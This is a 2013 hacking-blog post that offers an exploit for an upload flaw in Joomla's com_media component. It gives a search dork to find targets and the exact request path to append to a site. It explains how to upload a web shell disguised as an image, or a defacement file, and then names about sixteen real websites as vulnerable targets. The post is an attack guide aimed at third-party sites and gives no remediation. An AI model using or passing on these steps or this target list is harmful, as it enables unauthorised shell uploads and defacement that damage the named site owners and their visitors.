- Back to Home »
- Hacking and tools »
- Joomla component (com_media) Vulnerability
Posted by : Rock Alber
Monday, 15 July 2013
Joomla component (com_media) Vulnerability [#] Exploit Title: Com_Media (CMS JOOMLA)
[#] Date: 12-06-2013
[#] Author: Sultan Haikal
[#] Version: 2.5
[# ]Tested on: Windows Xp & Linux
[#] Dork :- "inurl:com_media"
[#] TarGet With Example :-
Target :- www.ayrshirebridge.co.uk
Just Add This After The Url :- /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
URL :- http://www.ayrshirebridge.co.uk/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
Click Browse at bottom upload your shell in png or jpej format using tamper data. OR
You can also Simply Upload Your Deface In Txt Format.
FInal :- Deface Goes Here
site.com/images/yourfilename.txt
Eg : http://ayrshirebridge.co.uk/images/x.txt
Thats All :D
[#] Vulnerable Website :
Com_Media Vulnerable Websites :-
www.ayrshirebridge.co.uk
www.magicrete.in
www.unitedwaypeel.org
www.cvbhejo.com
rockbandschoolofmusic.com
www.adriennejfurness.com
www.one-world-volunteer.net
hiddenneedle.com
www.wartakutim.com
permaculture.com.au/campus
arsomsilp.ac.th/health
www.skylinepark.org
www.gorillareisen.de
www.moclinejo.de
www.sv-mistelgau.de
www.ablogic.de